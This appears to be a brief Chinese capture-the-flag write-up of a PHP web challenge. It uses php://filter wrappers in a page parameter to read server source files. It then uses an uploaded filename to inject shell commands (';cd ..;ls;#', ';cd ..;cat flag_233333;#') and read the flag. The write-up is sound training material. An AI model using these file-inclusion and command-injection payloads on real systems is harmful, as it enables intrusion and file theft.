随便输入账号密码,没什么提示,试一下有没有注册界面register.php
注册并登录
试一下伪协议读取源码/user.php?page=php://filter/convert.base64-encode/resource=user
注意到这里有function.php
/user.php?page=php://filter/convert.base64-encode/resource=function
读取/user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg
但不成功
查了一下,得用这个url
//user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg
读取m4aaannngggeee
/user.php?page=m4aaannngggeee
应该是文件上传,抓包,修改文件名
尝试切到根目录的时候,发现/被过滤了,使用cd ..
payload:;cd ..;ls;#
读取flag:;cd ..;cat flag_233333;#
)
